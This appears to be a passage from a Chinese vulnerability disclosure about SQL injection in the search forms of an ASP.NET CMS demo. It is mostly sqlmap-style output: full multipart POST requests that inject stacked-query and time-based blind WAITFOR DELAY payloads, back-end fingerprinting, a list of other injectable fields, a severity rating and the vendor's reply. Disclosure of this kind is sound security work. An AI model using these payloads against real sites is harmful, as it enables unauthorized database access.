SQL Server/Sybase stacked queries Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__EVENTTARGET"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__EVENTARGUMENT"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__LASTFOCUS"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__VIEWSTATE"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------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$txtTitle"123456%'; WAITFOR DELAY '0:0:5'--------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$txtTime"2014-08------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$btnSeach"??��������------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"10------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"1------WebKitFormBoundary5n6dB9dFzpkAYygr-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__EVENTTARGET"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__EVENTARGUMENT"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__LASTFOCUS"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__VIEWSTATE"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------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$txtTitle"123456%' WAITFOR DELAY '0:0:5'--------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$txtTime"2014-08------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$btnSeach"??��������------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"10------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"1------WebKitFormBoundary5n6dB9dFzpkAYygr-----web server operating system: Windows 8.1 or 2012 R2web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5back-end DBMS: Microsoft SQL Server 2008current user: 'demozoomla_f'
c.商城管理的明细记录处:
d.企业黄页的黄页内容管理的搜索处
e.企业黄页的黄页标签管理的搜索处
验证码设计错误修复搜索型注入点
危害等级:低
漏洞Rank:5
确认时间:2014-08-06 13:19
我们的后台安全机制通过以下几个方式来保障:1、三次登陆出现验证码,即贵文所呈问题。2、安全码,默认不启用,可以启用之加强安全,预置的安全码。3、可变更的后台路径,对于demo我们是开放后台路径,而后台事实是一个变更的值。感谢贵文反馈的安全问题,我们将加强并尽快改进。
暂无